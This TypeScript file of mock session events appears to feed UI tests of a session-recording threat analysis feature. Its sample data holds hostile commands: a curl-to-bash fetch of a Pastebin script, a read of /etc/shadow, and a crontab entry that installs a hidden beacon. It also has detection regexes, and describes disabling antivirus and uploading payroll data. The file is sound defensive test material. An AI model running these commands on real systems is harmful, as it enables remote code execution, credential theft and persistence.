import {
  CommandCategory,
  ThreatCategory,
  type CommandSessionEvent,
  type SessionEvent,
} from 'e-teleport/services/recordings/types';
import { RiskLevel } from 'teleport/services/recordings';

export const MOCK_FAILED_EVENT: CommandSessionEvent = {
  category: CommandCategory.Other,
  riskLevel: RiskLevel.Medium,
  riskScore: 50,
  threatCategory: ThreatCategory.Discovery,
  timelineTitle: '',
  shortDescription:
    'Command analysis failed: temporary fake error for UI testing',
  detailedDescription:
    'The inference provider failed to analyze this command: temporary fake error for UI testing',
  suspiciousFlags: [],
  sensitiveItems: [],
  suspiciousPatterns: [],
  iocs: [],
  hasSensitiveData: false,
  privilegeEscalation: false,
  dataExfiltration: false,
  persistence: false,
  startOffset: 1500,
  endOffset: 2000,
  inferenceErrorMessage: 'temporary fake error for UI testing',
  commandEventDetails: {
    command: 'whoami && id',
    success: false,
    errorMessages: ['temporary fake error for UI testing'],
  },
};

export const MOCK_EVENTS: CommandSessionEvent[] = [
  {
    category: CommandCategory.Network,
    riskLevel: RiskLevel.Critical,
    riskScore: 95,
    threatCategory: ThreatCategory.Execution,
    timelineTitle: 'Remote Script Execution',
    timelineSubtitle: 'Downloaded and executed external payload',
    shortDescription: 'Fetched and executed a remote script from Pastebin',
    detailedDescription:
      'The attacker downloaded a script from a known paste site and piped it directly to bash for execution, bypassing any local file creation that could be detected.',
    suspiciousFlags: ['pipe_to_shell', 'external_url', 'paste_site'],
    sensitiveItems: [],
    suspiciousPatterns: ['curl.*\\|.*bash', 'pastebin\\.com'],
    iocs: ['pastebin.com/raw/abc123'],
    hasSensitiveData: false,
    privilegeEscalation: false,
    dataExfiltration: false,
    persistence: false,
    startOffset: 1000,
    endOffset: 2000,
    commandEventDetails: {
      command: 'curl -s https://pastebin.com/raw/abc123 | bash',
      success: true,
      errorMessages: [],
    },
  },
  {
    category: CommandCategory.DataAccess,
    riskLevel: RiskLevel.High,
    riskScore: 78,
    threatCategory: ThreatCategory.CredentialAccess,
    timelineTitle: 'Shadow File Access Attempt',
    shortDescription: 'Attempted to read password hashes',
    detailedDescription:
      'The user attempted to access the shadow file containing password hashes. The operation failed due to insufficient permissions.',
    suspiciousFlags: ['credential_file_access'],
    sensitiveItems: ['/etc/shadow'],
    suspiciousPatterns: ['cat.*/etc/shadow'],
    iocs: [],
    hasSensitiveData: false,
    privilegeEscalation: false,
    dataExfiltration: false,
    persistence: false,
    startOffset: 2500,
    endOffset: 3000,
    commandEventDetails: {
      command: 'cat /etc/shadow',
      success: false,
      errorMessages: ['Permission denied'],
    },
  },
  {
    category: CommandCategory.SystemConfiguration,
    riskLevel: RiskLevel.Critical,
    riskScore: 92,
    threatCategory: ThreatCategory.Persistence,
    timelineTitle: 'Cron Persistence Installed',
    timelineSubtitle: 'Hidden script scheduled for execution',
    shortDescription: 'Added a hidden script to crontab for persistence',
    detailedDescription:
      'A cron job was installed that executes a hidden beacon script every minute. The script location in /tmp with a dot-prefixed directory suggests intentional concealment.',
    suspiciousFlags: [
      'crontab_modification',
      'hidden_directory',
      'tmp_execution',
    ],
    sensitiveItems: [],
    suspiciousPatterns: ['crontab', '/tmp/\\.', 'beacon'],
    iocs: ['/tmp/.hidden/beacon.sh'],
    hasSensitiveData: false,
    privilegeEscalation: false,
    dataExfiltration: false,
    persistence: true,
    startOffset: 4000,
    endOffset: 4500,
    commandEventDetails: {
      command: 'echo "* * * * * /tmp/.hidden/beacon.sh" | crontab -',
      success: true,
      errorMessages: [],
    },
  },
];

export const MOCK_DESKTOP_EVENTS: SessionEvent[] = [
  {
    category: CommandCategory.Transfer,
    riskLevel: RiskLevel.High,
    riskScore: 82,
    threatCategory: ThreatCategory.Exfiltration,
    timelineTitle: 'Uploaded Payroll Data to Personal Cloud Storage',
    timelineSubtitle: 'Company document uploaded via browser',
    shortDescription:
      'Uploaded a payroll spreadsheet to a personal Google Drive account',
    detailedDescription:
      'The user opened a payroll spreadsheet from the Documents folder and uploaded it to a personal Google Drive account through the browser, moving sensitive company data outside of corporate storage.',
    suspiciousFlags: ['personal_cloud_storage', 'sensitive_document_upload'],
    sensitiveItems: ['C:\\Users\\Administrator\\Documents\\payroll.xlsx'],
    suspiciousPatterns: [],
    iocs: [],
    hasSensitiveData: true,
    privilegeEscalation: false,
    dataExfiltration: true,
    persistence: false,
    startOffset: 3000,
    endOffset: 9000,
    desktopEventDetails: {
      applications: ['Google Chrome', 'File Explorer'],
      visibleUrls: ['https://drive.google.com/drive/my-drive'],
      visibleFilePaths: ['C:\\Users\\Administrator\\Documents\\payroll.xlsx'],
      activeWindowTitle: 'My Drive - Google Chrome',
    },
  },
  {
    category: CommandCategory.SystemConfiguration,
    riskLevel: RiskLevel.Critical,
    riskScore: 90,
    threatCategory: ThreatCategory.DefenseEvasion,
    timelineTitle: 'Disabled Real-Time Antivirus Protection',
    shortDescription:
      'Turned off Windows Defender real-time protection in Windows Security',
    detailedDescription:
      'The user navigated to the Virus & threat protection settings in Windows Security and disabled real-time protection, leaving the host without active malware scanning.',
    suspiciousFlags: ['security_control_disabled'],
    sensitiveItems: [],
    suspiciousPatterns: [],
    iocs: [],
    hasSensitiveData: false,
    privilegeEscalation: false,
    dataExfiltration: false,
    persistence: false,
    startOffset: 12000,
    endOffset: 15000,
    desktopEventDetails: {
      applications: ['Windows Security'],
      activeWindowTitle: 'Windows Security',
    },
  },
  {
    category: CommandCategory.Other,
    riskLevel: RiskLevel.Low,
    riskScore: 5,
    threatCategory: ThreatCategory.None,
    timelineTitle: 'Browsed Internal Documentation',
    shortDescription: 'Read internal wiki pages in the browser',
    detailedDescription:
      'The user browsed internal documentation pages. No suspicious activity was observed during this period.',
    suspiciousFlags: [],
    sensitiveItems: [],
    suspiciousPatterns: [],
    iocs: [],
    hasSensitiveData: false,
    privilegeEscalation: false,
    dataExfiltration: false,
    persistence: false,
    startOffset: 16000,
    endOffset: 21000,
    desktopEventDetails: {
      applications: ['Microsoft Edge'],
      visibleUrls: ['https://wiki.internal.example.com/runbooks'],
      activeWindowTitle: 'Runbooks - Internal Wiki - Microsoft Edge',
    },
  },
];

export const MOCK_FAILED_DESKTOP_EVENT: SessionEvent = {
  category: CommandCategory.Other,
  riskLevel: RiskLevel.Medium,
  riskScore: 40,
  threatCategory: ThreatCategory.Unspecified,
  timelineTitle: '',
  shortDescription: 'Screen analysis failed for this segment',
  detailedDescription:
    'The inference provider failed to analyze this segment of the desktop session.',
  suspiciousFlags: [],
  sensitiveItems: [],
  suspiciousPatterns: [],
  iocs: [],
  hasSensitiveData: false,
  privilegeEscalation: false,
  dataExfiltration: false,
  persistence: false,
  startOffset: 22000,
  endOffset: 24000,
  inferenceErrorMessage: 'temporary fake error for UI testing',
  desktopEventDetails: {
    activeWindowTitle: 'Remote Desktop Connection',
  },
};
